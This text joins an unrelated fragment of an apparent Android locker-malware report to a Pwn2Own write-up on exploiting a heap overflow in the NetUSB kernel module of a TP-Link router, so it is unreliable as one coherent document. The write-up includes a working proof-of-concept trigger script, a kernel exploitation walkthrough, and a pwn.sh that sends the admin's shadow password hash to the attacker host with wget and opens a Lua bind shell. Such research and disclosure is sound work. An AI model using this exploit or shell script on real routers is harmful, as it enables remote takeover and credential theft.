Among the most prevalent Android Lockers seen in Q1/22 were Jisut, Pornlocker, and Congur. These are notorious for being difficult to remove and, in some cases, may require a factory reset of the phone. Some versions of lockers may even attempt to encrypt the user’s files; however, this is not frequently seen due to the complexity of encrypting files on Android devices.
The threat actors responsible for this malware generally rely on spreading through the use of third party app stores, game cheats, and adult content applications.
A common infection technique is to lure users through popular internet themes and topics – we strongly recommend that users avoid attempting to download game hacks and mods and ensure that they use reputable websites and official app stores.
In Q1/22, we saw spikes in this category, mainly related to the Pornlocker family (apps masquerading as adult content providers), which predominantly targeted users in Russia.
In the graph above, we can see the spike caused by the Pornlocker family in Q1/22.
Ondřej David, Malware Analysis Team Lead
Jakub Vávra, Malware Analyst
In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.
I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.
Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.
This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.
At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on Discord. The end goal for us is to participate in the contest and, after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, and the hardware was easy and cheap to get, so it felt like the right choice.
At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.
Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.
The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out which attack surfaces are interesting to look at.
As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.
Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two lines of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽♂️. Special thanks to Cody for letting me know 😅!
Getting a shell on the target
After reverse-engineering the web server for a few days, looking for low-hanging fruit and not finding any, I realized that I needed to find another way to get a shell on the device.
After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.
But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended ordering an FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.
After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:
Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:
Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.
Enumerating the attack surfaces
It was time for me to figure out which areas I should focus my time on. I did a bunch of reading as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new ground to lower the chance of entering the competition with a duplicate and also maximize my chances of finding something that would allow me to enter the competition. Before thinking about duplicates, I need a bug.
I started to do some very basic attack surface enumeration: running processes, iptables rules, listening sockets, crontabs, etc. Nothing fancy.
At first sight, the following processes looked interesting:
- the uhttpd HTTP server,
- the third-party dnsmasq service that could potentially be unpatched against upstream bugs (unlikely?),
- the tdpServer which was popped back in 2021 and was a vector for a vuln exploited in sync-server.
Chasing ghosts
Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.
Another thing I burned time on was going through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out if dnsmasq was properly patched against recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed otherwise 😔. Dead end.
NetUSB shenanigans
There were two strange lines in the netstat output from above that did stand out to me:
Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.
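To illustrate the kind of check that surfaces such sockets, here is a minimal sketch that scans `netstat -tlnp` style output for listening TCP sockets whose PID/Program column is just `-`. The function name and the sample lines are hypothetical (only port 20005 appears later in this post), and note that netstat also prints `-` when it lacks the privileges to see the owning process, so this is only a hint, not proof of a kernel-owned socket.

```python
def kernel_owned_listeners(netstat_output):
    """Return local addresses of listening TCP sockets that have no owning process."""
    listeners = []
    for line in netstat_output.splitlines():
        fields = line.split()
        # Expected columns: proto, recv-q, send-q, local, foreign, state, pid/program
        if len(fields) < 7 or not fields[0].startswith("tcp"):
            continue
        if fields[5] == "LISTEN" and fields[6] == "-":
            listeners.append(fields[3])
    return listeners


# Made-up sample in the `netstat -tlnp` layout; the PID and port 80 are illustrative.
SAMPLE = """\
tcp        0      0 0.0.0.0:80      0.0.0.0:*       LISTEN      1045/uhttpd
tcp        0      0 0.0.0.0:20005   0.0.0.0:*       LISTEN      -
"""

print(kernel_owned_listeners(SAMPLE))
```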
This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.
Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.
After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where attacker input is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:
I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefully, the SoftwareBus_fillBuf function is actually defined as follows:
int SoftwareBus_fillBuf(SbusConnection_t *SbusConnection, void *Buffer, int BufferLen) {
  if (SbusConnection) {
    if (Buffer) {
      if (BufferLen) {
        while (1) {
          GetLen = KTCP_get(SbusConnection, SbusConnection->ClientSocket, Buffer, BufferLen);
          if (GetLen <= 0)
            break;
          BufferLen -= GetLen;
          Buffer = (char *)Buffer + GetLen;
          if (!BufferLen)
            return 1;
        }
        kc_printf("INFO%04X: _fillBuf(): len = %d\n", 1275, GetLen);
        return 0;
      } else {
        return 1;
      }
    } else {
      // ...
      return 0;
    }
  } else {
    // ...
    return 0;
  }
}
KTCP_get is basically a wrapper around ks_recv, which means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data as I wanted. If you are interested in learning how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py, or read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The code below can trigger the above vulnerability:
from Crypto.Cipher import AES
import socket
import struct
import argparse

le8 = lambda i: struct.pack('=B', i)
le32 = lambda i: struct.pack('<I', i)

netusb_port = 20005

def send_handshake(s, aes_ctx):
    # Version
    s.send(b'\x56\x04')
    # Send random data
    s.send(aes_ctx.encrypt(b'a' * 16))
    _ = s.recv(16)
    # Receive & send back the random numbers.
    challenge = s.recv(16)
    s.send(aes_ctx.encrypt(challenge))

def send_bus_name(s, name):
    length = len(name)
    assert length - 1 < 63
    s.send(le32(length))
    b = name
    if type(name) == str:
        b = bytes(name, 'ascii')
    s.send(b)

def create_connection(target, port, name):
    second_aes_k = bytes.fromhex('5c130b59d26242649ed488382d5eaecc')
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, port))
    aes_ctx = AES.new(second_aes_k, AES.MODE_ECB)
    send_handshake(s, aes_ctx)
    send_bus_name(s, name)
    return s, aes_ctx

def main():
    parser = argparse.ArgumentParser('Zenith PoC2')
    parser.add_argument('--target', required=True)
    args = parser.parse_args()
    s, _ = create_connection(args.target, netusb_port, 'PoC2')
    s.send(le8(0xff))
    s.send(le8(0x21))
    s.send(le32(0xff_ff_ff_ff))
    p = b'\xab' * (0x1_000 * 100)
    s.send(p)
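To make the early-return behaviour of SoftwareBus_fillBuf easier to see, here is a small Python model of its loop. It is only a sketch: `fill_buf` mirrors the control flow of the decompiled function, while `make_peer` is a hypothetical stand-in for KTCP_get that hands out a fixed list of chunk sizes and then reports a closed connection.

```python
def fill_buf(recv, buffer_len):
    """Model of the SoftwareBus_fillBuf loop: returns (status, bytes_written)."""
    written = 0
    while buffer_len:
        got = recv(buffer_len)  # stand-in for KTCP_get; <= 0 means error or closed
        if got <= 0:
            return 0, written   # bail out early, the buffer is only partially filled
        buffer_len -= got
        written += got
    return 1, written


def make_peer(chunks):
    """Hypothetical peer that delivers the given chunk sizes, then closes."""
    remaining = iter(chunks)

    def recv(max_len):
        return min(next(remaining, 0), max_len)

    return recv


# The caller asks for 0xffffffff bytes, but the peer decides when the copy stops.
print(fill_buf(make_peer([0x1000, 0x1000]), 0xFFFFFFFF))
```

The point of the model is that the number of bytes written is bounded by what the peer sends, not by the length the caller requested.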
Another interesting detail was that the allocation function is mallocPageBuf which I didn't know about. After looking into its implementation, it eventually calls into __get_free_pages which is part of the Linux kernel. __get_free_pages allocates 2**n pages, and is implemented using what is called a binary buddy allocator. I wasn't familiar with that kind of allocator, and ended up kind of fascinated by it. You can read about it in Chapter 6: Physical Page Allocation if you want to know more.
Wow ok, so maybe I could do something useful with this bug. Still a long shot, but based on my understanding the bug would give me full control over the content and I was able to overflow the pages with pretty much as much data as I wanted. The only thing that I couldn't fully control was the size passed to the allocation: because of the integer overflow, I could only trigger a mallocPageBuf call with a size in the interval [0, 8]. mallocPageBuf aligns the passed size to the next power of two, and calculates the order (n in 2**n) to invoke __get_free_pages.
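As a rough illustration of the size-to-order step, the sketch below computes the smallest order n such that 2**n pages cover a byte count. It assumes 0x1000-byte pages (the block size mentioned later in the post) and treats anything up to one page as order 0; `order_for_size` is a hypothetical helper, not the driver's mallocPageBuf.

```python
PAGE_SIZE = 0x1000  # assumed page size


def order_for_size(size, page_size=PAGE_SIZE):
    """Smallest n such that 2**n pages hold `size` bytes (at least one page)."""
    pages = max(1, -(-size // page_size))  # ceiling division, minimum one page
    order = 0
    while (1 << order) < pages:
        order += 1
    return order


for size in (1, 0x1000, 0x1001, 0x3000, 0x4001):
    print(hex(size), "-> order", order_for_size(size))
```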
Another good thing going for me was that the kernel didn't have KASLR, and I also noticed that the kernel did its best to keep running even when encountering access violations or whatnot. It wouldn't crash and reboot at the first hiccup on the road but instead try to run until it couldn't anymore. Sweet.
I also eventually discovered that the driver was leaking kernel addresses over the network. In the above snippet, kc_printf is invoked with diagnostic / debug strings. Looking at its code, I realized the strings are actually sent over the network on a different port. I figured this could also be helpful for both synchronization and leaking some allocations made by the driver.
int kc_printf(const char *a1, ...) {
  // ...
  v1 = vsprintf(v6, a1);
  v2 = v1 < 257;
  v3 = v1 + 1;
  if (!v2) {
    v6[256] = 0;
    v3 = 257;
  }
  v5 = v3;
  kc_dbgD_send(&v5, v3 + 4); // <-- send over socket
  return printk("<1>%s", v6);
}
Pretty funny right?
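Reading the snippet above, each debug message appears to go out as a 4-byte length (v5) followed by that many bytes of NUL-terminated text. That framing is an inference from the decompiled code, and it assumes v5 and v6 sit next to each other in memory. Under that assumption, a receiver could split the stream as sketched below; `parse_debug_frames` is a hypothetical helper and the big-endian default is a guess about the target, so it is left as a parameter.

```python
import struct


def parse_debug_frames(data, byteorder=">"):
    """Split a byte stream into messages framed as <u32 length><length bytes>."""
    frames = []
    offset = 0
    while offset + 4 <= len(data):
        (length,) = struct.unpack_from(byteorder + "I", data, offset)
        payload = data[offset + 4 : offset + 4 + length]
        if len(payload) < length:
            break  # incomplete frame, wait for more data
        frames.append(payload.rstrip(b"\x00").decode("ascii", "replace"))
        offset += 4 + length
    return frames


# Synthetic stream built with the same assumed framing.
stream = struct.pack(">I", 6) + b"hello\x00" + struct.pack(">I", 3) + b"ok\x00"
print(parse_debug_frames(stream))
```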
Booting NetUSB in QEMU
Although I had a root shell on the device, I wasn't able to debug the kernel or the driver's code. This made it very hard to even think about exploiting this vulnerability. On top of that, I am a complete Linux noob so this lack of introspection wasn't going to work. What are my options?
Well, as I mentioned earlier TP-Link is maintaining a GPL archive which has information on the Linux version they use, the patches they apply and supposedly everything necessary to build a kernel. I thought that was extremely nice of them and that it should give me a good starting point to be able to debug this driver under QEMU. I knew this wouldn't give me the most precise simulation environment but, at the same time, it would be a vast improvement over my current situation. I would be able to hook up GDB, inspect the allocator state, and hopefully make progress.
Turns out this was much harder than I thought. I started by trying to build the kernel via the GPL archive. In appearance, everything is there and a simple make should just work. But that didn't cut it. It took me weeks to actually get it to compile (right dependencies, patching bits here and there, ...), but I eventually did it. I had to try a bunch of toolchain versions, fix random files that would lead to errors on my Linux distribution, etc. To be honest I mostly forgot all the details here but I remember it being painful. If you are interested, I have zipped up the filesystem of this VM and you can find it here: wheezy-openwrt-ath.tar.xz.
I thought this was the end of my suffering but it was not. At all. The built kernel wouldn't boot in QEMU and would hang at boot time. I tried to understand what was going on, but it looked related to the emulated hardware and I was honestly out of my depth. I decided to look at the problem from a different angle. Instead, I downloaded a Linux MIPS QEMU image from aurel32's website that was booting just fine, and decided that I would try to merge both of the kernel configurations until I ended up with a bootable image that has a configuration as close as possible to the kernel running on the device. Same kernel version, allocators, same drivers, etc. At least similar enough to be able to load the NetUSB.ko driver.
Again, because I am a complete Linux noob I failed to really see the complexity there. So I got started on this journey where I must have compiled easily 100+ kernels until being able to load and execute the NetUSB.ko driver in QEMU. The main challenge that I failed to see was that in Linux land, configuration flags can change the size of internal structures. This means that if you are trying to run a driver A on kernel B, the driver A might mistake a structure to be of size C when it is in fact of size D. That's exactly what happened. Starting the driver in this QEMU image led to a ton of random crashes that I couldn't really explain at first. So I followed multiple rabbit holes until realizing that my kernel configuration was just not in agreement with what the driver expected. For example, the net_device defined below shows that its definition varies depending on kernel configuration options being on or off: CONFIG_WIRELESS_EXT, CONFIG_VLAN_8021Q, CONFIG_NET_DSA, CONFIG_SYSFS, CONFIG_RPS, CONFIG_RFS_ACCEL, etc. But that's not all. Any types used by this structure can do the same which means that looking at the main definition of a structure is not enough.
struct net_device {
// ...
#ifdef CONFIG_WIRELESS_EXT
  /* List of functions to handle Wireless Extensions (instead of ioctl).
   * See <net/iw_handler.h> for details. Jean II */
  const struct iw_handler_def *wireless_handlers;
  /* Instance data managed by the core of Wireless Extensions. */
  struct iw_public_data *wireless_data;
#endif
// ...
#if IS_ENABLED(CONFIG_VLAN_8021Q)
  struct vlan_info __rcu *vlan_info; /* VLAN info */
#endif
#if IS_ENABLED(CONFIG_NET_DSA)
  struct dsa_switch_tree *dsa_ptr; /* dsa specific data */
#endif
// ...
#ifdef CONFIG_SYSFS
  struct kset *queues_kset;
#endif
#ifdef CONFIG_RPS
  struct netdev_rx_queue *_rx;
  /* Number of RX queues allocated at register_netdev() time */
  unsigned int num_rx_queues;
  /* Number of RX queues currently active in device */
  unsigned int real_num_rx_queues;
#ifdef CONFIG_RFS_ACCEL
  /* CPU reverse-mapping for RX completion interrupts, indexed
   * by RX queue number. Assigned by driver. This must only be
   * set if the ndo_rx_flow_steer operation is defined. */
  struct cpu_rmap *rx_cpu_rmap;
#endif
#endif
//...
};
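The effect of those #ifdef blocks on layout can be reproduced with a toy structure. The sketch below uses ctypes to build two views of a made-up `toy_net_device` (the `name` and `mtu` fields and the helper are illustrative, not the real kernel layout) and prints where `mtu` lands in each; a driver compiled against one view and loaded into a kernel using the other would read the wrong bytes.

```python
import ctypes


def make_toy_net_device(config):
    """Build a toy struct whose fields depend on (hypothetical) config flags."""
    fields = [("name", ctypes.c_char * 16)]
    if config.get("CONFIG_WIRELESS_EXT"):
        fields.append(("wireless_handlers", ctypes.c_void_p))
        fields.append(("wireless_data", ctypes.c_void_p))
    if config.get("CONFIG_SYSFS"):
        fields.append(("queues_kset", ctypes.c_void_p))
    fields.append(("mtu", ctypes.c_uint))
    return type("toy_net_device", (ctypes.Structure,), {"_fields_": fields})


# What the driver was built against vs. what the running kernel actually uses.
driver_view = make_toy_net_device({"CONFIG_WIRELESS_EXT": True, "CONFIG_SYSFS": True})
kernel_view = make_toy_net_device({"CONFIG_SYSFS": True})

print("driver expects mtu at offset", driver_view.mtu.offset)
print("kernel stores mtu at offset", kernel_view.mtu.offset)
```

The exact offsets depend on the pointer size of the machine running the sketch; what matters is that they differ by the size of the two optional pointers.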
Once I figured that out, I went through a pretty lengthy process of trial and error. I would start the driver, get information about the crash and try to look at the code / structures involved and see if a kernel configuration option would impact the layout of a relevant structure. From there, I could see the difference between the kernel configuration for my bootable QEMU image and the kernel I had built from the GPL and see where the mismatches were. If there was one, I could simply turn the option on or off, recompile and hope that it doesn't make the kernel unbootable under QEMU.
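Spotting those mismatches by eye gets tedious, so a small helper can do the comparison. The sketch below parses two kernel `.config` texts (lines of the form `CONFIG_X=y` or `# CONFIG_X is not set`) and reports every option whose value differs; the function names and the sample contents are illustrative only.

```python
NOT_SET_SUFFIX = " is not set"


def parse_kconfig(text):
    """Map option name -> value, using 'n' for '# CONFIG_X is not set' lines."""
    options = {}
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("# CONFIG_") and line.endswith(NOT_SET_SUFFIX):
            options[line[2 : -len(NOT_SET_SUFFIX)]] = "n"
        elif line.startswith("CONFIG_") and "=" in line:
            name, value = line.split("=", 1)
            options[name] = value
    return options


def config_mismatches(a, b):
    """Return {option: (value_in_a, value_in_b)} for options that differ."""
    return {
        name: (a.get(name, "n"), b.get(name, "n"))
        for name in sorted(set(a) | set(b))
        if a.get(name, "n") != b.get(name, "n")
    }


# Made-up fragments standing in for the QEMU image config and the GPL build config.
qemu_cfg = parse_kconfig("CONFIG_SYSFS=y\n# CONFIG_RPS is not set\nCONFIG_NET_DSA=y\n")
gpl_cfg = parse_kconfig("CONFIG_SYSFS=y\nCONFIG_RPS=y\n")
print(config_mismatches(qemu_cfg, gpl_cfg))
```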
After at least 136 compilations (the number of times I found make ARCH=mips in one of my .bash_history 😅) and an enormous amount of frustration, I eventually built a Linux kernel version able to run NetUSB.ko 😲:
For the readers that would like to do the same, here are some technical details that they might find useful (I probably forgot most of the other ones):
- I used debootstrap to easily be able to install older Linux distributions until one worked fine with package dependencies, older libc, etc. I used a Debian Wheezy (7.11) distribution to build the GPL code from TP-Link as well as cross-compiling the kernel. I uploaded archives of those two systems: wheezy-openwrt-ath.tar.xz and wheezy-compile-kernel.tar.xz. You should be able to extract those on a regular Ubuntu Intel x64 VM and chroot in those folders and SHOULD be able to reproduce what I described. Or at least, be very close to reproducing it.
- I cross compiled the kernel using the following toolchain: toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2 (gcc (Linaro GCC 4.6-2012.02) 4.6.3 20120201 (prerelease)). I used the following command to compile the kernel: $ make ARCH=mips CROSS_COMPILE=/home/toolchain-mips_r2_gcc-4.6-linaro_uClibc-0.9.33.2/bin/mips-openwrt-linux- -j8 vmlinux. You can find the toolchain in wheezy-openwrt-ath.tar.xz which is downloaded / compiled from the GPL code, or you can grab the binaries directly off wheezy-compile-kernel.tar.xz.
- You can find the command line I used to start QEMU in start_qemu.sh and dbg.sh to attach GDB to the kernel.
Enters Zenith
Once I was able to attach GDB to the kernel I finally had an environment where I could get as much introspection as I needed. Note that because of all the modifications I had done to the kernel config, I didn't really know if it would be possible to port the exploit to the real target. But I also didn't have an exploit at the time, so I figured this would be another problem to solve later if I even get there.
I started to read a lot of code, documentation and papers about Linux kernel exploitation. The Linux kernel version was old enough that it didn't have a bunch of more recent mitigations. This gave me some hope. I spent quite a bit of time trying to exploit the overflow from above. In Exploiting the Linux kernel via packet sockets, Andrey Konovalov describes in detail an attack that looked like it could work for the bug I had found. Also, read the article as it is both well written and fascinating. The overall idea is that kmalloc internally uses the buddy allocator to get pages off the kernel and as a result, we might be able to place the buddy page that we can overflow right before pages used to store a kmalloc slab. If I remember correctly, my strategy was to drain the order 0 freelist (blocks of memory that are 0x1000 bytes) which would force blocks from the higher order to be broken down to feed the freelist. I imagined that a block from the order 1 freelist could be broken into 2 chunks of 0x1000 which would mean I could get a 0x1000 block adjacent to another 0x1000 block that could be now used by a kmalloc-1024 slab. I struggled and tried a lot of things and never managed to pull it off. I remember the bug had a few annoying things I hadn't realized when finding it, but I am sure a more experienced Linux kernel hacker could have written an exploit for this bug.
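The splitting behaviour this strategy relies on can be shown with a toy model. The sketch below is a deliberately simplified buddy allocator (no merging, no per-CPU lists, made-up addresses) that serves an order-0 request from a higher order by splitting a block and putting the upper half on the lower freelist; `ToyBuddy` is a teaching aid, not the Linux implementation.

```python
PAGE = 0x1000


class ToyBuddy:
    """Tiny buddy-style allocator: per-order freelists of block base addresses."""

    def __init__(self, free_lists):
        self.free = {order: sorted(addrs) for order, addrs in free_lists.items()}

    def alloc(self, order):
        for current in range(order, max(self.free) + 1):
            if self.free.get(current):
                addr = self.free[current].pop(0)
                # Split down to the requested order, freeing the upper half each time.
                while current > order:
                    current -= 1
                    self.free.setdefault(current, []).append(addr + (PAGE << current))
                return addr
        raise MemoryError("no block large enough")


# One free order-0 block and one free order-1 block (addresses are made up).
buddy = ToyBuddy({0: [0x5000], 1: [0x8000]})
drained = buddy.alloc(0)   # empties the order-0 freelist
first = buddy.alloc(0)     # forces the order-1 block to be split
second = buddy.alloc(0)    # gets the other half of that block
print(hex(drained), hex(first), hex(second))
```

Once the order-0 list is drained, the next two order-0 allocations come from the same order-1 block and are therefore physically adjacent.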
I thought, oh well. Maybe there's something better. Maybe I should focus on looking for a similar bug but in a kmalloc'd region as I wouldn't have to deal with the same problems as above. I would still need to worry about being able to place the buffer adjacent to a juicy corruption target though. After looking around for a bit longer I found another integer overflow:
void *SoftwareBus_dispatchNormalEPMsgOut(SbusConnection_t *SbusConnection, char HostCommand, char Opcode) {
  // ...
  switch (OpcodeMasked) {
    case 0x50:
      if (SoftwareBus_fillBuf(SbusConnection, ReceiveBuffer, 4)) {
        ReceivedSize = _bswapw(*(uint32_t*)ReceiveBuffer);
        AllocatedBuffer = _kmalloc(ReceivedSize + 17, 208);
        if (!AllocatedBuffer) {
          return kc_printf("INFO%04X: Out of memory in USBSoftwareBus", 4296);
        }
        // ...
        if (!SoftwareBus_fillBuf(SbusConnection, AllocatedBuffer + 16, ReceivedSize))
Cool. But at this point, I was a bit out of my depth. I was able to overflow kmalloc-128 but didn't really know what type of useful objects I would be able to put there from over the network. After a bunch of trial and error I started to notice that if I was taking a small pause after the allocation of the buffer but before overflowing it, an interesting structure would be magically allocated fairly close to my buffer. To this day, I haven't fully debugged where it exactly came from but as this was my only lead I went along with it.
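The wraparound in the `ReceivedSize + 17` computation from the snippet above is easy to check by hand. The sketch below assumes the addition is carried out in 32 bits (the value is read as a uint32_t and the target is MIPS32); `wrapped_alloc_size` is a hypothetical helper that only models the arithmetic.

```python
MASK32 = 0xFFFFFFFF


def wrapped_alloc_size(received_size, header=17):
    """Size actually requested when `received_size + header` is computed in 32 bits."""
    return (received_size + header) & MASK32


for size in (0x100, 0xFFFFFFEF, 0xFFFFFFFF):
    print(hex(size), "->", hex(wrapped_alloc_size(size)))
```

A huge attacker-supplied size therefore turns into a tiny allocation request, while the later fill still uses the original, un-wrapped length.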
The target kernel doesn't have ASLR and doesn't have NX, so my exploit is able to hardcode addresses and execute the heap directly which was nice. I can also place arbitrary data in the heap using the various allocation functions I had reverse-engineered earlier. For example, triggering a 3MB large allocation always returned a fixed address where I could stage content. To get this address, I simply patched the driver binary to output the address on the real device after the allocation as I couldn't debug it.
My final exploit, Zenith, overflows an adjacent wait_queue_head_t.head.next structure that is placed by the socket stack of the Linux kernel with the address of a crafted wait_queue_entry_t under my control (Trasher class in the exploit code). This is the definition of the structure:
This structure has a function pointer, func, that I use to hijack the execution and redirect the flow to a fixed location, in a large kernel heap chunk where I previously staged the payload (0x83c00000 in the exploit code). The function invoking the func function pointer is __wake_up_common and you can see its code below:
This is what it looks like in GDB once q->head.next/prev has been corrupted:
(gdb) break *__wake_up_common+0x30 if ($v0 & 0xffffff00) == 0xdeadbe00
(gdb) break sock_recvmsg if msg->msg_iov[0].iov_len == 0xffffffff
(gdb) c
Continuing.
sock_recvmsg(dst=0xffffffff85173390)
Breakpoint 2, __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
at kernel/sched/core.c:3375
3375 kernel/sched/core.c: No such file or directory.
(gdb) p *q
$1 = {lock = {{rlock = {raw_lock = {<No data fields>}}}}, task_list = {next = 0xdeadbee1,
prev = 0xbaadc0d1}}
(gdb) bt
#0 __wake_up_common (q=0x85173480, mode=1, nr_exclusive=1, wake_flags=1, key=0xc1)
at kernel/sched/core.c:3375
#1 0x80141ea8 in __wake_up_sync_key (q=<optimized out>, mode=<optimized out>,
nr_exclusive=<optimized out>, key=<optimized out>) at kernel/sched/core.c:3450
#2 0x8045d2d4 in tcp_prequeue (skb=0x87eb4e40, sk=0x851e5f80) at include/net/tcp.h:964
#3 tcp_v4_rcv (skb=0x87eb4e40) at net/ipv4/tcp_ipv4.c:1736
#4 0x8043ae14 in ip_local_deliver_finish (skb=0x87eb4e40) at net/ipv4/ip_input.c:226
#5 0x8040d640 in __netif_receive_skb (skb=0x87eb4e40) at net/core/dev.c:3341
#6 0x803c50c8 in pcnet32_rx_entry (entry=<optimized out>, rxp=0xa0c04060, lp=0x87d08c00,
dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1199
#7 pcnet32_rx (budget=16, dev=0x87d08800) at drivers/net/ethernet/amd/pcnet32.c:1212
#8 pcnet32_poll (napi=0x87d08c5c, budget=16) at drivers/net/ethernet/amd/pcnet32.c:1324
#9 0x8040dab0 in net_rx_action (h=<optimized out>) at net/core/dev.c:3944
#10 0x801244ec in __do_softirq () at kernel/softirq.c:244
#11 0x80124708 in do_softirq () at kernel/softirq.c:293
#12 do_softirq () at kernel/softirq.c:280
#13 0x80124948 in invoke_softirq () at kernel/softirq.c:337
#14 irq_exit () at kernel/softirq.c:356
#15 0x8010198c in ret_from_exception () at arch/mips/kernel/entry.S:34
Once the func pointer is invoked, I get control over the execution flow and I execute a simple kernel payload that leverages call_usermodehelper_setup / call_usermodehelper_exec to execute user mode commands as root. It pulls a shell script off a listening HTTP server on the attacker machine and executes it.
The pwn.sh shell script simply leaks the admin's shadow hash, and opens a bindshell (cheers to Thomas Chauchefoin and Kevin Denis for the Lua oneliner) the attacker can connect to (if the kernel hasn't crashed yet 😳):
#!/bin/sh
export LPORT=31337
wget http://{ip_local}:8000/pwd?$(grep -E admin: /etc/shadow)
lua -e 'local k=require("socket"); local s=assert(k.bind("*",os.getenv("LPORT"))); local c=s:accept(); while true do local r,x=c:receive();local f=assert(io.popen(r,"r")); local b=assert(f:read("*a"));c:send(b); end;c:close();f:close();'
The exploit also uses the debug interface that I mentioned earlier as it leaks kernel-mode pointers and is overall useful for basic synchronization (cf the Leaker class).
OK at that point, it works in QEMU... which is pretty wild. Never thought it would. Ever. What's also wild is that I am still in time for the Pwn2Own registration, so maybe this is also possible 🤔. Reliability wise, it worked well enough in the QEMU environment: about 3 times out of 5 I would say. Good enough.
I started to port the exploit over to the real device and, to my surprise, it worked there as well. The reliability was poorer but I was impressed that it still worked. Crazy. Especially with both the hardware and the kernel being different! As I still wasn't able to debug the target's kernel I was left with dmesg outputs to try to make things better. Tweak the spray here and there, try to go faster or slower; trying to find a magic combination. In the end, I didn't find anything magic; the exploit was unreliable but hey I only needed it to land once on stage 😅. This is what it looks like when the stars align 💥:
Beautiful. Time to register!
Entering the contest
As the contest was fully remote (bummer!) because of COVID-19, contestants needed to provide exploits and documentation prior to the contest. Fully remote meant that the ZDI staff would throw our exploits at the environment they had set up.
At that point we had two exploits and that's what we registered for. Right after receiving confirmation from ZDI, I noticed that TP-Link pushed an update for the router 😳. I thought: damn. I was at work when I saw the news and was stressed about the bug getting killed. Or worried that the update could have changed anything that my exploit was relying on: the kernel, etc. I finished my day at work and pulled down the firmware from the website. I checked the release notes while the archive was downloading but it didn't have any hints suggesting that they had updated either NetUSB or the kernel which was... good. I extracted the files from the firmware image with binwalk and quickly verified the NetUSB.ko file. I grabbed a hash and ... it was the same. Wow. What a relief 😮💨.
